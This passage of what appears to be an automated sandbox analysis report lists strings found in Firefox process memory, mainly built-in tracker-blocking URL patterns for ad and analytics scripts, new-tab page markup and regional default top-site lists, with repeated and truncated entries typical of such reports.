"*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8858000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*:
                          Source: firefox.exe, 00000020.00000002.2970521081.00000253E7E09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000020.00000002.2970521081.00000253E7E09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E94A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E87EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3213102159.00000253EBB2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E94A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3278500608.00000253EC003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3278500608.00000253EC003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3278500608.00000253EC003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]] equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]] equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: webcompat@mozilla.org.412316860420*://cdn.branch.io/branch-latest.min.js*"https://smartblock.firefox.etp/play.svg"webcompat@mozilla.org.412316860420*://c.amazon-adsystem.com/aax2/apstag.js["*://trends.google.com/trends/embed*"]*://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.jswebcompat@mozilla.org.412316860420https://smartblock.firefox.etp/play.svg"*://trends.google.com/trends/embed*""*://trends.google.com/trends/embed*"*://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat_video.js*://trends.google.com/trends/embed*webcompat@mozilla.org.412316860420*://pub.doubleverify.com/signals/pub.js**://static.criteo.net/js/ld/publishertag.js*://www.everestjs.net/static/st.v3.js**://*.imgur.com/js/vendor.*.bundle.js["*://trends.google.com/trends/embed*"]https://smartblock.firefox.etp/facebook.svg*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js*webcompat@mozilla.org.412316860420webcompat@mozilla.org.412316860420"https://smartblock.firefox.etp/facebook.svg"*://trends.google.com/trends/embed*webcompat@mozilla.org.412316860420*://s.webtrends.com/js/webtrends.min.js"*://cdn.branch.io/branch-latest.min.js*""*://auth.9c9media.ca/auth/main.js""*://static.chartbeat.com/js/chartbeat_video.js""*://static.criteo.net/js/ld/publishertag.js""*://*.imgur.com/js/vendor.*.bundle.js""*://static.chartbeat.com/js/chartbeat.js""*://*.imgur.io/js/vendor.*.bundle.js"*://www.google-analytics.com/gtm/js**://cdn.adsafeprotected.com/iasPET.1.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/analytics.js**://cdn.optimizely.com/public/*.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://www.googletagservices.com/tag/js/gpt.js**://adservex.media.net/videoAds.js*"*://www.everestjs.net/static/st.v3.js*"*://imasdk.googleapis.com/js/sdkloader/ima3.js*://s.webtrends.com/js/webtrends.js"*://pub.doubleverify.com/signals/pub.js*""*://c.amazon-adsystem.com/aax2/apstag.js""*://www.rva311.com/static/js/main.*.chunk.js"*://www.googletagmanager.com/gtm.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/advancedLinkTracking.js*://connect.facebook.net/*/all.js**://www.google-analytics.com/plugins/ua/ec.js*://*.vidible.tv/*/vidible-min.js*webcompat@mozilla.org.412316860420*://*.moatads.com/*/moatheader.js*"*://libs.coremetrics.com/eluminate.js""*://www.google-analytics.com/gtm/js*""*://connect.facebook.net/*/sdk.js*""*://connect.facebook.net/*/all.js*""*://www.googletagmanager.com/gtm.js*""*://www.google-analytics.com/plugins/ua/ec.js""*://www.google-analytics.com/analytics.js*""*://imasdk.googleapis.com/js/sdkloader/ima3.js""*://www.googletagservices.com/tag/js/gpt.js*""*://cdn.adsafeprotected.com/iasPET.1.js""*://static.adsafeprotected.com/iasPET.1.js""*://adservex.media.net/videoAds.j
                          Source: firefox.exe, 00000020.00000003.2821731492.00000253ED08C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3323867690.00000253EE131000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3323867690.00000253EE187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3309604059.00000253ECCD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2822643296.00000253ECCEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2822643296.00000253ECCD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
